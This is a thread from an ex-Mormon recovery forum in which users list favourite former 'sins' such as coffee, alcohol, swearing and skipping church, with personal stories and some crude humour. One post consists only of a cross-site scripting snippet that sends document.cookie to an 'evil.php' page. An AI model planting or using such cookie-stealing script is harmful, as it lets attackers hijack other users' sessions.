Recovery Board  : RfM
Recovery from Mormonism (RfM) discussion forum. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Posted by: BJClarke ( )
Date: March 12, 2019 02:57AM

"sin" since leaving the church and being free? Obviously I haven't had time to do everything yet, but so far I loove using the lord's name in vain. It's the little things :D

Options: ReplyQuote
Posted by: Wally Prince ( )
Date: March 12, 2019 03:22AM

an occasional beer or wine.

Not going to Church on Sunday.

The freedom to see and acknowledge obvious things (such as the obvious fact that Joseph Smith was fornicating freak and fraud who lied about everything, the obvious fact that ALL of the church leaders are just guys in suits making business decisions and have no more divine inspiration than the typical manager of a a fast food restaurant, the obvious fact that the Book of Mormon is a clumsy hodge-podge of early nineteenth century ideas that were commonly discussed in upstate New York, the fact that the Holy Ghost is a fictional character that can be conveniently invoked by Church leaders whenever conveniently needed to escape from the consequences of an unraveling lie, etc., etc...)

It's hard to say which is my favorite. They're all definite quality-of-life improvements compared to the days when I was a mind-controlled Morgbot.

Posted by: Tevai ( )
Date: March 12, 2019 03:42AM

A reminder for those who post on this thread:

According to the rules, this is a PG-13-ish board.

Thank you!

Posted by: exminion ( )
Date: March 12, 2019 03:58AM

Skiing, playing, going shopping, going to a movie on Sunday.
Not paying tithing
Not wearing magic underwear
Wearing pants, whenever I feel like it
Having a double piercing
Eating meals without saying a prayer first
Drinking tea and coffee
Telling the truth
Talking openly about temple secrets
Not having three church callings
Not cleaning the church building
Not being subservient to men

Y'know, not one of these Mormon "sins" things is considered a sin at the Christian church I attend. Not one!

This apostate has no desire to sin.

Posted by: Amyjo ( )
Date: March 12, 2019 08:00AM

Yes to all the above !

Date: March 12, 2019 08:09AM

Edited 1 time(s). Last edit at 03/12/2019 08:09AM by Amyjo.

Posted by: Heartless ( )
Date: March 12, 2019 06:10AM

That great and grand sin condemned from the garden onwards.

Thinking for myself and desiring to know good from evil.

Posted by: CrispingPin ( )
Date: March 12, 2019 07:26AM

Thinking for myself is my favorite “sin.”

Not wasting Sundays in boring, repetitive meetings (wearing uncomfortable clothes) is nice.

Not paying my “dues” for several years (which allowed me to retire last year) is very rewarding.

Edited 1 time(s). Last edit at 03/12/2019 07:30AM by CrispingPin.

Date: March 12, 2019 08:10AM

I still try not to take the Lord's name in vain. And I try to follow the ten commandments as much as possible. I don't commit adultery, nor covet other men's wives (har har,) for the most part I don't lie or steal although I've sometimes told a white lie now and then.

But then I still believe in God and the holy bible. I just ditched Mormonism. It freed me to leave Mormonism behind. God was waiting for me in the wings to remind me that I wasn't alone on my journey. I still seek after divine guidance and blessings for my life, and those of my children's.

I am definitely not a saint however. Far from perfect. And a long ways to go before I will be ready for God to call me home.

As for leaving Mormonism, my favorite 'vices' now are tea and coffee - in moderation.

Posted by: Aquarius123 ( )
Date: March 12, 2019 08:19AM

My favorite sin is not wasting Sundays or any other time for that matter sitting in boring meetings and/or working with primary, young women, or relief society wasting my time.How wonderful it is to be free.

Edited 1 time(s). Last edit at 03/12/2019 08:20AM by Aquarius123.

Posted by: mikemitchell ( )
Date: March 12, 2019 08:23AM

If it's a sin to do woodworking on Sunday while drinking black coffee and listening to old Country and Western music on the AM station, I guess that is my favorite.

Edited 1 time(s). Last edit at 03/12/2019 08:24AM by mikemitchell.

Posted by: Done & Done ( )
Date: March 12, 2019 10:00AM

Being an enemy to God--a natural man--which covers everything that makes Mormonism so sanctimoniously unnatural. Well, except God is a lousy adversary since the last sighting was a bush that had caught fire, unless you count the *cough cough* open robed appearance to JoJo.

Posted by: Shinehah ( )
Date: March 12, 2019 10:36AM

Is it a sin that I no longer feel guilty that I am never quite good enough and never quite do enough?

Date: March 12, 2019 10:42AM

There's a scene in a Mr. Bean movie where an older bald fat guy playing the Anglican priest of England moons the crowd with a graffiti sign written across his behind that reads: "Look Busy, Jesus is Coming!"

It cracked me up.

Edited 1 time(s). Last edit at 03/12/2019 12:14PM by Amyjo.

Posted by: CL2 ( )
Date: March 12, 2019 10:43AM

My "ex" is gay. We've been "separated" for 23 years or more. I knew when I married him. The leaders told me it was up to me to save him. He left me a single mother with age 10 twins without any support. Now we are friends and live together in the house we bought, but I paid for for 20 years myself.

The nonmormon guy I dated at age 20 got a divorce 14 years ago and we've been together since. So I'm an adulteress according to "the law." I wear the badge with pride. I was your extremely devout, extremely naive mormon girl who saved herself for marriage and then the leaders told me to experiment to see if my gay boyfriend could get turned on by a woman. I couldn't deal with it. Eventually, we got married and one reason is because we needed those leaders OUT OF OUR LIVES (including Boyd). They were destroying me. They'd already done a good job on my husband.

I also enjoy alcohol now and then. I love going places on Sunday in Utah as the restaurants and movie theaters aren't crowded. Only problem is that I usually walk my dogs around the local stake center (2 blocks away) and on Sundays, I won't. AND my daughter is TBM. That's the big problem.

Posted by: Eric K ( )
Date: March 12, 2019 10:59AM

When I was working full time, it was great to have a full 2 day weekend. Church was never relaxing or a respite from day to day challenges.

Posted by: fossilman ( )
Date: March 12, 2019 11:04AM

Jello shots - at the intersection of Momoism and debauchery.

Posted by: Dave the Atheist ( )
Date: March 14, 2019 11:18AM

I don't get this jello shots thing. Do you do the shot while still liquid or do you let it solidify first ? And should exmos have grated carrots in theirs ?

Posted by: Dave the Atheist ( )
Date: March 14, 2019 11:20AM

I think, therefore I am, I think

Posted by: mel ( )
Date: March 14, 2019 03:26PM

Dave the Atheist Wrote:
-------------------------------------------------------
> I don't get this jello shots thing.

You know how you make jello with the package and stirring in water? You just use vodka instead of some of the water when you are making the jello. So it is like eating jello but it has vodka in it. As I understand it. Things could have changed though.

Posted by: Kathleen ( )
Date: March 12, 2019 12:20PM

My favorite is being purely vacuous.

As kids we had a huge empty upstairs where we could play but never sleep. Mom was afraid of fire.

Leaving mormonism is having my huge empty room back, completely uncluttered, where I can lay on the floor, watch the sparkling dust, and think.

Posted by: BJClarke ( )
Date: March 12, 2019 02:01PM

I love this a lot

Date: March 12, 2019 03:17PM

It sounds like a place where you can dream too.

Posted by: Done & Done ( )
Date: March 14, 2019 10:15AM

This is one of my favorite all time comments on RFM, kathleen. The big empty room speaks of so much. I wouldn't even try to define it but it's just one of those images that gives me hope. Can't really explain it except it makes me believe that even as old as I am, I can still play dress-ups and make up games or draw on the walls with no one telling me I can't. Or at least love watching others to it.

Posted by: Lot's Wife ( )
Date: March 14, 2019 10:54AM

An utterly beautiful image.

Posted by: ex mo ( )
Date: March 12, 2019 12:57PM

<SCRIPT type="text/javascript">
var adr = '../evil.php?cakemonster=' + escape(document.cookie);
</SCRIPT>

Posted by: catholicrebel ( )
Date: March 12, 2019 01:48PM

I Left TSCC and went back to being Catholic, HAPPILY. I drink coffee, tea, and alcohol on CHURCH GROUNDS. At our church picnic every year there is bound to be beer and wine floating around somewhere. My children were baptized Catholic so we just went back to our old routine. My daughter was too young to ever remember the short time we spent in TSCC and my son wasn’t born until I came back to the Catholic faith. I visited TSCC a few times with him when they tried to pull me back in but he’s too young to remember and was baptized Catholic almost immediately after, I for sure called it quits. I teach CCD on Sunday mornings and attend mass and get to go home and nap. I’m not forced to attend multiple meetings in order to be in good standing with the church. Do I have expectations to meet in order to be considered a practicing Catholic? Sure. Is someone knocking my door down to make sure I meet them? No. No one is blowing up my phone if I miss mass which is rare honestly but If I choose to attend another parish from the parish I am listed as a member, no one is jumping on me and telling me I need to be attending there and not somewhere else. No one is asking me when was the last time I went to confession or if I give up meat on Fridays during Lent (I do by the way.) The point is, no one worries about my business but me and doing these things make me happy so I do them, not because if someone catches me not doing them I’m going to be put under some sort of church disipline. I’m not scared into obedience because others will be calling upon me making sure I live my faith the way they think I should. My tattoos are ok. My piercings are too. I also don’t have to be rebaptized and go through a year of scrutiny to be a member again. I just went to confession and continued on. Life is good on this side... no matter what others think. No one judges the coffee pot being on every morning before work WHILE I read scripture. My underwear being from Target is ok too. Life is good.

Posted by: Razortooth ( )
Date: March 12, 2019 01:58PM

Pipes and cigars.

Posted by: jacob ( )
Date: March 12, 2019 02:12PM

You shall have no other Gods but me.

* What about no gods at all?

You shall not make for yourself any idol, nor bow down to it or worship it.

* I don't pray to anything but there are plenty of things that I find valuable.

You shall not misuse the name of the Lord your God.

* It took me a while to learn how to swear properly but nowadays I think I uses the name of the Lord your God perfectly.

You shall remember and keep the Sabbath day holy.

* Sunday is important and I make sure that I have one every week.

Respect your father and mother.

* My mother has passed from what was a miserable life. My father holds a lot of fault for my mother's miserable life. But I still speak to him regularly and I haven't distanced myself from him like I have most of the rest of my family. I think I'm good.

You must not commit murder.

* I killed my faith. Does that count?

You must not commit adultery.

* I don't think I was really committed it was really just a one time mistake.

You must not steal.

* Not in a long time.

You must not give false evidence against your neighbor.

* Never once, although my Mormon neighbors are guilty of this.

You must not be envious of your neighbor's goods.

* Nope, my house is nicer, my cars are nicer, my kids are cooler, nothing to covet.

You shall not be envious of his house nor his wife, nor anything that belongs to your neighbor.

* Well his wife doesn't belong to him so I think I'm skirting by on a technicality.

Seriously though, coffee, beer, wine, whiskey, vodka, brandy, gin, tea, sex, naughty words, self respect, and all that. But my favorite?

Speaking ill of the lord's anointed. I fucking love that shit.

Edited 2 time(s). Last edit at 03/12/2019 02:14PM by jacob.

Date: March 14, 2019 03:28PM

jacob Wrote:

> You must not commit adultery.
>
> * I don't think I was really committed it was really just a one time mistake.

Haha! Good interpretation, Jacob!

Posted by: You Too? ( )
Date: March 12, 2019 02:31PM

1. Not paying tithing
2. Not fasting

Or you could change the order of those two.

Posted by: Lethbridge Reprobate ( )
Date: March 14, 2019 09:38AM

Not treating Sunday as anything special. Haven't for 50+ years.

Posted by: gettinrral ( )
Date: March 14, 2019 09:47AM

And what is the lords name exactly??
Hint, it’s not Jesus Christ, or God...
And I never use it in vain. I always have a purpose behind it’s use.

Date: March 14, 2019 03:32PM

I don't really like coffee or tea or alcohol so I didn't go out and do them just because I quit.

The best thing for me is knowing that if I make a new friend, it is real, not someone assigned to be nice to me or pretending to be nice to me because the church said to.

Glad you are here, BJ, and I am glad you are enjoying life!!!

Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In

Screen Name: 
Subject: 
Spam prevention:
Please, enter the code that you see below in the input field. This is for blocking bots that try to post this form automatically.